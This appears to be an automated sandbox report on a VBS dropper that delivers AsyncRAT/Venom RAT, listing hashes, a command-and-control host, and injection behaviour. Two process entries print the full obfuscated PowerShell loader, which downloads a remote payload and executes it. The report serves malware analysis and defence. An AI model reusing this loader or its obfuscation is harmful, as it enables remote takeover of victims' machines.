Analysis
-
max time kernel
143s -
max time network
145s -
platform
windows7_x64 -
resource
win7-20240508-en -
resource tags
arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system -
submitted
24-05-2024 13:15
Static task
static1
Behavioral task
behavioral1
Sample
255c4ecba922d8b56534bd7a571525c67eb39bbef0f18bc96e414160a95fc2f6.vbs
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
255c4ecba922d8b56534bd7a571525c67eb39bbef0f18bc96e414160a95fc2f6.vbs
Resource
win10v2004-20240426-en
General
-
Target
255c4ecba922d8b56534bd7a571525c67eb39bbef0f18bc96e414160a95fc2f6.vbs
-
Size
897KB
-
MD5
c983e816294b2d4c2213db5bc4339393
-
SHA1
4eb96d15af10865ac93ed29ec475bb8eafe91ea3
-
SHA256
255c4ecba922d8b56534bd7a571525c67eb39bbef0f18bc96e414160a95fc2f6
-
SHA512
fac24fd9947e732069c7a3fdcb91376ace629ace66b1e0f9fb384b9ca03725c7f39b8f817c4bea4593595f30ebb67083fbafaebe61bfc59a3176caddf3aeaecb
-
SSDEEP
12288:qzTzUyR7hSRac+qkLmttaGgMskgqoiMHsp90:UXh+k+taGKqoJO0
Malware Config
Extracted
asyncrat
5.0.5
Venom Clients
xvern429.duckdns.org:8890
Venom_RAT_HVNC_Mutex_Venom RAT_HVNC
-
delay
1
-
install
false
-
install_folder
%AppData%
Signatures
-
Blocklisted process makes network request 5 IoCs
Processes:
powershell.exeflow pid process 3 1976 powershell.exe 5 1976 powershell.exe 7 1976 powershell.exe 9 1976 powershell.exe 11 1976 powershell.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
Processes:
wab.exepid process 2300 wab.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
powershell.exewab.exepid process 2820 powershell.exe 2300 wab.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 2820 set thread context of 2300 2820 powershell.exe wab.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepowershell.exepid process 1976 powershell.exe 2820 powershell.exe 2820 powershell.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
powershell.exepid process 2820 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exepowershell.exewab.exedescription pid process Token: SeDebugPrivilege 1976 powershell.exe Token: SeDebugPrivilege 2820 powershell.exe Token: SeDebugPrivilege 2300 wab.exe -
Suspicious use of WriteProcessMemory 20 IoCs
Processes:
WScript.exepowershell.exepowershell.exedescription pid process target process PID 2436 wrote to memory of 1976 2436 WScript.exe powershell.exe PID 2436 wrote to memory of 1976 2436 WScript.exe powershell.exe PID 2436 wrote to memory of 1976 2436 WScript.exe powershell.exe PID 1976 wrote to memory of 2752 1976 powershell.exe cmd.exe PID 1976 wrote to memory of 2752 1976 powershell.exe cmd.exe PID 1976 wrote to memory of 2752 1976 powershell.exe cmd.exe PID 1976 wrote to memory of 2820 1976 powershell.exe powershell.exe PID 1976 wrote to memory of 2820 1976 powershell.exe powershell.exe PID 1976 wrote to memory of 2820 1976 powershell.exe powershell.exe PID 1976 wrote to memory of 2820 1976 powershell.exe powershell.exe PID 2820 wrote to memory of 2988 2820 powershell.exe cmd.exe PID 2820 wrote to memory of 2988 2820 powershell.exe cmd.exe PID 2820 wrote to memory of 2988 2820 powershell.exe cmd.exe PID 2820 wrote to memory of 2988 2820 powershell.exe cmd.exe PID 2820 wrote to memory of 2300 2820 powershell.exe wab.exe PID 2820 wrote to memory of 2300 2820 powershell.exe wab.exe PID 2820 wrote to memory of 2300 2820 powershell.exe wab.exe PID 2820 wrote to memory of 2300 2820 powershell.exe wab.exe PID 2820 wrote to memory of 2300 2820 powershell.exe wab.exe PID 2820 wrote to memory of 2300 2820 powershell.exe wab.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\255c4ecba922d8b56534bd7a571525c67eb39bbef0f18bc96e414160a95fc2f6.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:2436 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Guttiferae = 1;$Benzinen='Sub';$Benzinen+='strin';$Benzinen+='g';Function Sikkerhedspolitikken($Datamatiserede){$Lemviger=$Datamatiserede.Length-$Guttiferae;For($concocting=5;$concocting -lt $Lemviger;$concocting+=6){$Afbinder100+=$Datamatiserede.$Benzinen.Invoke( $concocting, $Guttiferae);}$Afbinder100;}function natasjas($Svirres){. ($Resultanternes) ($Svirres);}$Allehelgensdag=Sikkerhedspolitikken 'DrikkMLet.ioHospiz,ionoiAfstaljugoslRytmeaVedli/ Till5 Omkl.Utril0Safia Polyn(kapitWLo enigi.dan Aer.d Ideao.ideewKurtisManda PacifN ThioTIndus Regar1Conje0T pir.U,sen0P ric;Vadef gamenWSpeediChronnbanne6Super4Flutt;.loug Gr.mexsamme6 Untr4Trypa;Sorge Myrfor,uligv.karn:Tinwo1Vivif2Her,k1Konst. .hor0Durga),ncon DispuGFrugte Dvnlcra kskEksp.oSamle/Bajon2Pedic0Cytoc1 Irre0Medie0Arbel1Rnebl0 Disp1Czech ,eviF VasoiNerverErfa.eJoinifColeooSelvbxLille/Allel1Stand2Postf1Short.Mal,s0 esun ';$Haandslagene=Sikkerhedspolitikken 'SlangUdeeknsWeeweeModulr ,uri-WalliAJvni,gUdskeedatofnOver,tTryks ';$Funktionserklringen=Sikkerhedspolitikken 'afterh PlectDeklatTudehp B,ndsSt.sk:Logis/Theo /SpottwOilcuwLabrowB.rac.SkiftsTi.gieFecalnEntadd.nstisPartspSny ta NonecChoulemaler.DretscKo,troKabbemBeevi/Lam hpK,stbr Top,o arta/Re.btdOpposlU,tra/Kon,eiFrox,7 TimetMns rdvoicibAutorrBlokd ';$Abrogators=Sikkerhedspolitikken 'g.lli> Rets ';$Resultanternes=Sikkerhedspolitikken ' La.kiA,laseInsenxTaiwa ';$Almene='Nonconcentration';$Korrektiv = Sikkerhedspolitikken 'Bagloe SkancRnt.ehvarrioBened Desm%Fors.aUn pop.eimppPotand nfuaT.lnrtSprogaAct.r%disen\ comeAKor.lb,pinasBarontsammeeDisp.rWhid,gCla.te A.nd.PlakaPF,skei.dekrgNonvi Straf& Mens&R.itb Barb eUrobicSkrmbhSummaoModta perstFishm ';natasjas (Sikkerhedspolitikken 'Besl,$ubestgkurvel.ostso OutbbBedmma.olytl ndo:KlaptOCincivTukaneR.eebrBrne,lProtooPolypyindleaNdr,nlExtretMes.iySimar7Proje5 Ins.=Signa(UnrefcHaremmVejrldSporu Okker/RepeocPligt Stors$A.aniKUnsilo aparrNonrerResereTopatkBlasttDitleiVinkevTorch)Slag, ');natasjas (Sikkerhedspolitikken 'Poten$ BlodgTrlaslPat tospionb tigea letnl Over:O.ienDTvangiDictavHandliBrnehdP,mphi.etaln EthygD,ndelSourby Natt=E.sal$AkutbF SupeuBeve,nFactokSystetSpilli SynuoUntrin jaldsGasleeUproorAfrusk lidelApiolrC.colidancenAcq.ig GlobeThroanDejun.Jord,s T ilpunvenlR ckeiNoneqt Unpo(,agac$I.dgaAKrimibBrndgrPucknoBariug NormaIncomtTndinoInsamrDitrisCount)Rokke ');$Funktionserklringen=$Dividingly[0];$Forfodssnkningers= (Sikkerhedspolitikken ' Sigh$VidnegA.giolBatteoDelngbMe.asaLigeslSydaf: Ca aCre iga AftebLe.anlSpeeceP olamKark,eThyronAnlgs=MuscaNYeanceMesmew Dups-LyefyO UnshbKillojAk,ivevoldtcDobbetM.uth StrukSlucilySk ersConvit ConjeStatsmFo.et. CausNPolyee Al,mtHo.se. InveWSpilleStnk bAnimeCProtel SlgtiCcilie.uancnKvldct');$Forfodssnkningers+=$Overloyalty75[1];natasjas ($Forfodssnkningers);natasjas (Sikkerhedspolitikken 'Samle$ F.rnCStr baVitribC.ppil.culkeOrganmL troeUn.annNo cu.RelenHFrsn,eKrediaRylerdOver,eD,skerechoisTernr[Spec.$BlaabH MolmaKnib.a lhenChi.kdCo,mosUndd lCathea Pigeg levaeRe.nfnsa vne.eade]Inapp=level$ In oA CykelIndgrlDr,cueCrow.hPl,aseforudl GylpgNonreeP incnColo.svenend Hemia Int g Korr ');$Fyldigstes3=Sikkerhedspolitikken 'U,ern$Skg,sC PresaPtyalbProb l,repoepreshm ,iale amornBott . StaaDHepato HandwElefan Rel,lPlotxoNomadaCu,tod reorFL.sseiKrestlAggreeFakto(Mascu$OsphrFHjp,luCremenCasinkMilittBaskeiFangeoStartnUv shsFlagde sandrGrafikIndh,lnephrrDi.tai,isaun SamagPracteSmu.tn Iglu,Vider$Okaf.UOversnSubsidSpi,de ud,vrVarmesSt pfgPoundtTtesaeHoorasBrief)Aram, ';$Undersgtes=$Overloyalty75[0];natasjas (Sikkerhedspolitikken 'Nymph$BalkagStudelHexago F,jlbPunicaI.deslM.rke: PallCM,reraConneb hichb,nacqi ,andeC chv=Rheg,(TestaTOm.tdegaelns .tratkikr -BolerPForbjaNon,etTwoneh Paa, Kasse$SlidsUDoundnZeugodthreneNereirKompasLubecgPostptTilreeCalipsLaan.) Misd ');while (!$Cabbie) {natasjas (Sikkerhedspolitikken 'Enami$HumorgRhynilBl.dhoElimib jernagevrelFremm:Filmiu.ersldIod,tluncurbFou.teLnrelrKhap,eLejetsS mio=Toil $ AptitKlamprParolu.orpheHande ') ;natasjas $Fyldigstes3;natasjas (Sikkerhedspolitikken 'TildkS UncutPrinta UkonrHittet ati-RegioS SprolThesoePor.eepseudpColor Polym4Trstu ');natasjas (Sikkerhedspolitikken ' Unde$Lyreng Sto.lDeklaoUdefibTelesaVederlRosem: BuskCFormuaFo lbb S.ltbGeo iiLivseeSphyg=Fedts(EmmerT La,deLie osCleartVognm-S,lonPAfleda GuldtBrugshfamil Smask$OxideUSpec.nPlowmd S erePorosrAnodisBeskjgKogeptJ.suieAfmejsCoesi)Farve ') ;natasjas (Sikkerhedspolitikken 'B,squ$ a xegfilmkl Unspo Mor,bMyeloaAfhngl Djae:RepliSTaksetWrinkrBreddiRuddevSignaySn,rr=Rachi$E,trag sp.ol CommoTermibDgnbeamaximlU.ius:AntincAnkeruKvotadPam ldI dorl AteleValgrs Stipo,alesm gu.ue .ort+Trill+Bulle%Dusse$BonzeDOr.ani Wh,svVerani dsstdharmeiBredsnNicolg Comil En,oygeo.a.Fler.c ikto Brdfu,punknEl.xetOutst ') ;$Funktionserklringen=$Dividingly[$Strivy];}$Dustpan=301913;$Eyl=29401;natasjas (Sikkerhedspolitikken 'Snkek$Voldgg Overl ootloSindsbT llaaUnt,ulPhosp: D.plOB.illv Overe,ectirGeik eUop.rdAb,oa ,rott=Ine,p S.ejGg vineKlodstIn.er-MelliCDubbioturannmillit SpraeLyttenFuldttTaxas M,nom$StranUba,rnnBrugsdLon ie,nexarLemlssPh.togBair tOpr.ae StamsAncyl ');natasjas (Sikkerhedspolitikken 'Dehyd$Stu.ag OverlImbeco regrbPicasa Vicel F,gs:AmpliNSgangoTe.ran,iarra DecodBurb,hDi see Ve dsMarikiFarv v A.ideUnsallKr egyCeli. Endol= Egen Tilsk[ ToniSBoatlyEja usG lintOffloeK,rnam Skaf.FlerdCVandroKa,itnFordmvUndereLevnirVocimt.rott]W oli:F mvr:RitheF PortrBefleo Agelm Re.oBWi,dla OversParaleFrie,6R,cur4SuperSSlagtt ModsrAnticicytobnStyrbgTypog(Excys$PicofOIs,gov .ateeHealsr.ildeevrdikd,mdbn) dtyn ');natasjas (Sikkerhedspolitikken ' Chr $FinlngNontelAflivo.affebdiag,aNonaglrhod.:BegumS rudtiIhidigRingmnKinksapolyptB.dtiu Arc.rDowief visoApolorS.artkSide lEndotaFiskerRipariStivsn.uksug aijaeForspn P.lv crev,= Udgr Flan[ prelS tenbyUndersKis,etunstreAma.emLay o.PhyllTdemoneadelsxKonsttUdtrr.Fla.nEP.rvenUdvalc,hrusohalocd Br.li RedonBonnegAnsva]lidia:Notes:.thnoAtheurSBev dC RediI SkydI.ouga. AngiGPalm e Win.tMaskiSBloustErgotrDe.enirinnenConsugFdse ( Chol$Nedt.NReklao alponPhotiaF ypadpi.cph radie flyvsIlysaiW ippvS.stee BestlB,oksyGr,nd)Time, ');natasjas (Sikkerhedspolitikken 'Staal$ BitrgRe.eclDa skoPos,tb ereaaMon.tlAlgo,:B skvSUn.evp Pre i onjrUnbelop,oacimet.ldRivet=Rge.i$BiarcSM,ridiCo.nigEsse,nStandaSaltpt InteuChiv,r BedrfVelkooKil irNyhe kStu il Overa adoirm emoiorthon UrocgNonhyeKnol nSu.li.UidensNoncouUnsucbPalmisSkibstNavnerDaskeiEnkelnSammegHyp,i(B.wra$MisogDNon.auexogesAzocytClickpUnwaraLouisnDrmme,.ryst$PhotoEImmo.y Str.l Neds)Revis ');natasjas $Spiroid;"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1976 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Absterge.Pig && echo t"3⤵PID:2752
-
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Guttiferae = 1;$Benzinen='Sub';$Benzinen+='strin';$Benzinen+='g';Function Sikkerhedspolitikken($Datamatiserede){$Lemviger=$Datamatiserede.Length-$Guttiferae;For($concocting=5;$concocting -lt $Lemviger;$concocting+=6){$Afbinder100+=$Datamatiserede.$Benzinen.Invoke( $concocting, $Guttiferae);}$Afbinder100;}function natasjas($Svirres){. ($Resultanternes) ($Svirres);}$Allehelgensdag=Sikkerhedspolitikken 'DrikkMLet.ioHospiz,ionoiAfstaljugoslRytmeaVedli/ Till5 Omkl.Utril0Safia Polyn(kapitWLo enigi.dan Aer.d Ideao.ideewKurtisManda PacifN ThioTIndus Regar1Conje0T pir.U,sen0P ric;Vadef gamenWSpeediChronnbanne6Super4Flutt;.loug Gr.mexsamme6 Untr4Trypa;Sorge Myrfor,uligv.karn:Tinwo1Vivif2Her,k1Konst. .hor0Durga),ncon DispuGFrugte Dvnlcra kskEksp.oSamle/Bajon2Pedic0Cytoc1 Irre0Medie0Arbel1Rnebl0 Disp1Czech ,eviF VasoiNerverErfa.eJoinifColeooSelvbxLille/Allel1Stand2Postf1Short.Mal,s0 esun ';$Haandslagene=Sikkerhedspolitikken 'SlangUdeeknsWeeweeModulr ,uri-WalliAJvni,gUdskeedatofnOver,tTryks ';$Funktionserklringen=Sikkerhedspolitikken 'afterh PlectDeklatTudehp B,ndsSt.sk:Logis/Theo /SpottwOilcuwLabrowB.rac.SkiftsTi.gieFecalnEntadd.nstisPartspSny ta NonecChoulemaler.DretscKo,troKabbemBeevi/Lam hpK,stbr Top,o arta/Re.btdOpposlU,tra/Kon,eiFrox,7 TimetMns rdvoicibAutorrBlokd ';$Abrogators=Sikkerhedspolitikken 'g.lli> Rets ';$Resultanternes=Sikkerhedspolitikken ' La.kiA,laseInsenxTaiwa ';$Almene='Nonconcentration';$Korrektiv = Sikkerhedspolitikken 'Bagloe SkancRnt.ehvarrioBened Desm%Fors.aUn pop.eimppPotand nfuaT.lnrtSprogaAct.r%disen\ comeAKor.lb,pinasBarontsammeeDisp.rWhid,gCla.te A.nd.PlakaPF,skei.dekrgNonvi Straf& Mens&R.itb Barb eUrobicSkrmbhSummaoModta perstFishm ';natasjas (Sikkerhedspolitikken 'Besl,$ubestgkurvel.ostso OutbbBedmma.olytl ndo:KlaptOCincivTukaneR.eebrBrne,lProtooPolypyindleaNdr,nlExtretMes.iySimar7Proje5 Ins.=Signa(UnrefcHaremmVejrldSporu Okker/RepeocPligt Stors$A.aniKUnsilo aparrNonrerResereTopatkBlasttDitleiVinkevTorch)Slag, ');natasjas (Sikkerhedspolitikken 'Poten$ BlodgTrlaslPat tospionb tigea letnl Over:O.ienDTvangiDictavHandliBrnehdP,mphi.etaln EthygD,ndelSourby Natt=E.sal$AkutbF SupeuBeve,nFactokSystetSpilli SynuoUntrin jaldsGasleeUproorAfrusk lidelApiolrC.colidancenAcq.ig GlobeThroanDejun.Jord,s T ilpunvenlR ckeiNoneqt Unpo(,agac$I.dgaAKrimibBrndgrPucknoBariug NormaIncomtTndinoInsamrDitrisCount)Rokke ');$Funktionserklringen=$Dividingly[0];$Forfodssnkningers= (Sikkerhedspolitikken ' Sigh$VidnegA.giolBatteoDelngbMe.asaLigeslSydaf: Ca aCre iga AftebLe.anlSpeeceP olamKark,eThyronAnlgs=MuscaNYeanceMesmew Dups-LyefyO UnshbKillojAk,ivevoldtcDobbetM.uth StrukSlucilySk ersConvit ConjeStatsmFo.et. CausNPolyee Al,mtHo.se. InveWSpilleStnk bAnimeCProtel SlgtiCcilie.uancnKvldct');$Forfodssnkningers+=$Overloyalty75[1];natasjas ($Forfodssnkningers);natasjas (Sikkerhedspolitikken 'Samle$ F.rnCStr baVitribC.ppil.culkeOrganmL troeUn.annNo cu.RelenHFrsn,eKrediaRylerdOver,eD,skerechoisTernr[Spec.$BlaabH MolmaKnib.a lhenChi.kdCo,mosUndd lCathea Pigeg levaeRe.nfnsa vne.eade]Inapp=level$ In oA CykelIndgrlDr,cueCrow.hPl,aseforudl GylpgNonreeP incnColo.svenend Hemia Int g Korr ');$Fyldigstes3=Sikkerhedspolitikken 'U,ern$Skg,sC PresaPtyalbProb l,repoepreshm ,iale amornBott . StaaDHepato HandwElefan Rel,lPlotxoNomadaCu,tod reorFL.sseiKrestlAggreeFakto(Mascu$OsphrFHjp,luCremenCasinkMilittBaskeiFangeoStartnUv shsFlagde sandrGrafikIndh,lnephrrDi.tai,isaun SamagPracteSmu.tn Iglu,Vider$Okaf.UOversnSubsidSpi,de ud,vrVarmesSt pfgPoundtTtesaeHoorasBrief)Aram, ';$Undersgtes=$Overloyalty75[0];natasjas (Sikkerhedspolitikken 'Nymph$BalkagStudelHexago F,jlbPunicaI.deslM.rke: PallCM,reraConneb hichb,nacqi ,andeC chv=Rheg,(TestaTOm.tdegaelns .tratkikr -BolerPForbjaNon,etTwoneh Paa, Kasse$SlidsUDoundnZeugodthreneNereirKompasLubecgPostptTilreeCalipsLaan.) Misd ');while (!$Cabbie) {natasjas (Sikkerhedspolitikken 'Enami$HumorgRhynilBl.dhoElimib jernagevrelFremm:Filmiu.ersldIod,tluncurbFou.teLnrelrKhap,eLejetsS mio=Toil $ AptitKlamprParolu.orpheHande ') ;natasjas $Fyldigstes3;natasjas (Sikkerhedspolitikken 'TildkS UncutPrinta UkonrHittet ati-RegioS SprolThesoePor.eepseudpColor Polym4Trstu ');natasjas (Sikkerhedspolitikken ' Unde$Lyreng Sto.lDeklaoUdefibTelesaVederlRosem: BuskCFormuaFo lbb S.ltbGeo iiLivseeSphyg=Fedts(EmmerT La,deLie osCleartVognm-S,lonPAfleda GuldtBrugshfamil Smask$OxideUSpec.nPlowmd S erePorosrAnodisBeskjgKogeptJ.suieAfmejsCoesi)Farve ') ;natasjas (Sikkerhedspolitikken 'B,squ$ a xegfilmkl Unspo Mor,bMyeloaAfhngl Djae:RepliSTaksetWrinkrBreddiRuddevSignaySn,rr=Rachi$E,trag sp.ol CommoTermibDgnbeamaximlU.ius:AntincAnkeruKvotadPam ldI dorl AteleValgrs Stipo,alesm gu.ue .ort+Trill+Bulle%Dusse$BonzeDOr.ani Wh,svVerani dsstdharmeiBredsnNicolg Comil En,oygeo.a.Fler.c ikto Brdfu,punknEl.xetOutst ') ;$Funktionserklringen=$Dividingly[$Strivy];}$Dustpan=301913;$Eyl=29401;natasjas (Sikkerhedspolitikken 'Snkek$Voldgg Overl ootloSindsbT llaaUnt,ulPhosp: D.plOB.illv Overe,ectirGeik eUop.rdAb,oa ,rott=Ine,p S.ejGg vineKlodstIn.er-MelliCDubbioturannmillit SpraeLyttenFuldttTaxas M,nom$StranUba,rnnBrugsdLon ie,nexarLemlssPh.togBair tOpr.ae StamsAncyl ');natasjas (Sikkerhedspolitikken 'Dehyd$Stu.ag OverlImbeco regrbPicasa Vicel F,gs:AmpliNSgangoTe.ran,iarra DecodBurb,hDi see Ve dsMarikiFarv v A.ideUnsallKr egyCeli. Endol= Egen Tilsk[ ToniSBoatlyEja usG lintOffloeK,rnam Skaf.FlerdCVandroKa,itnFordmvUndereLevnirVocimt.rott]W oli:F mvr:RitheF PortrBefleo Agelm Re.oBWi,dla OversParaleFrie,6R,cur4SuperSSlagtt ModsrAnticicytobnStyrbgTypog(Excys$PicofOIs,gov .ateeHealsr.ildeevrdikd,mdbn) dtyn ');natasjas (Sikkerhedspolitikken ' Chr $FinlngNontelAflivo.affebdiag,aNonaglrhod.:BegumS rudtiIhidigRingmnKinksapolyptB.dtiu Arc.rDowief visoApolorS.artkSide lEndotaFiskerRipariStivsn.uksug aijaeForspn P.lv crev,= Udgr Flan[ prelS tenbyUndersKis,etunstreAma.emLay o.PhyllTdemoneadelsxKonsttUdtrr.Fla.nEP.rvenUdvalc,hrusohalocd Br.li RedonBonnegAnsva]lidia:Notes:.thnoAtheurSBev dC RediI SkydI.ouga. AngiGPalm e Win.tMaskiSBloustErgotrDe.enirinnenConsugFdse ( Chol$Nedt.NReklao alponPhotiaF ypadpi.cph radie flyvsIlysaiW ippvS.stee BestlB,oksyGr,nd)Time, ');natasjas (Sikkerhedspolitikken 'Staal$ BitrgRe.eclDa skoPos,tb ereaaMon.tlAlgo,:B skvSUn.evp Pre i onjrUnbelop,oacimet.ldRivet=Rge.i$BiarcSM,ridiCo.nigEsse,nStandaSaltpt InteuChiv,r BedrfVelkooKil irNyhe kStu il Overa adoirm emoiorthon UrocgNonhyeKnol nSu.li.UidensNoncouUnsucbPalmisSkibstNavnerDaskeiEnkelnSammegHyp,i(B.wra$MisogDNon.auexogesAzocytClickpUnwaraLouisnDrmme,.ryst$PhotoEImmo.y Str.l Neds)Revis ');natasjas $Spiroid;"3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2820 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Absterge.Pig && echo t"4⤵PID:2988
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"4⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:2300
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD52299a6fb34550e1d3e6dd69f6fb5cbfb
SHA1082eb4da1816d3a20d7bead043b7367b9dfcdf24
SHA2562d550eb29bb22df74cc499d69f71653a96b26d091276472a24023f4f2d42eb01
SHA51212cedad6552f192b93e81b4cb0e53b9db554be8bb3f4c209a25be50e91160a5b532bc72c6965dc49afa4ac756ae00562612a7626f30becd2c06573118666c8c0
-
Filesize
68KB
MD529f65ba8e88c063813cc50a4ea544e93
SHA105a7040d5c127e68c25d81cc51271ffb8bef3568
SHA2561ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
SHA512e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa
-
Filesize
177KB
MD5435a9ac180383f9fa094131b173a2f7b
SHA176944ea657a9db94f9a4bef38f88c46ed4166983
SHA25667dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34
SHA5121a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a
-
Filesize
431KB
MD5ce1f757dad7e08f32964a255a380674e
SHA119e38ec002272355856d0f68324c0b18a7a07dc0
SHA2564e0fe5353ac7e82175ab48a53995198157b546bb2eec91ee1d7d63432b710548
SHA512ad6b88260234a1abf893680f0332510cd08f9192b6e76478c962203617e689b9cf538f7b2aa44422493d4a80b872a24bcf4258e17a540eaf901a59f37933707e
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\JQ18KB3ITWJJSPMTJK0U.temp
Filesize7KB
MD531e946d92f43dac050f1142afdb612f2
SHA1bc97c240fd9a57fac638e4992e1b097b1834f20f
SHA256bad1c8e64108f46e9000247fc338f5e01310338d6107bbd4bc1cd9a80dcb0e74
SHA5124552b752c8d562ab7dcfd13818508053fded8e87fa7046b0bb1ac3455ab78e38c5587751a27353829aa137a8acfdb09df13dae9a7e689f75c8df29052e095399